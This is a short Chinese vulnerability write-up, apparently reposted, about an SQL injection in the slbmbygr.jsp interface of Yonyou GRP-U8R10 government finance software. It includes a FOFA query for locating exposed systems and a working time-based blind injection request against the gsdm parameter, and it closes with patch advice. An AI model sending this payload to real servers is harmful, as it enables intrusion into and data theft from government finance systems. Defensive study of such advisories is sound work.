用友GRP | 您所在的位置:网站首页 › 用友grpu8行政事业财务管理软件内网穿透 › 用友GRP |
前言
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一、产品简介用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。 二、漏洞描述目前该系统slbmbygr.jsp接口存在SQL注入漏洞 三、影响范围用友GRP-U8R10 U8Manager B、C、G 系列产品 < 20230905 四、复现环境FOFA:app=“用友-GRP-U8” 五、漏洞复现1.访问存在漏洞的网站 2.POC GET /u8qx/slbmbygr.jsp?gsdm=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: your-ip3.成功 后续可以获取数据库敏感信息甚至获得用户主机权限。 七、修复建议目前官方已发布更新补丁,请及时更新。 参考链接https://blog.csdn.net/qq_41904294/article/details/133916403 |
CopyRight 2018-2019 实验室设备网 版权所有 |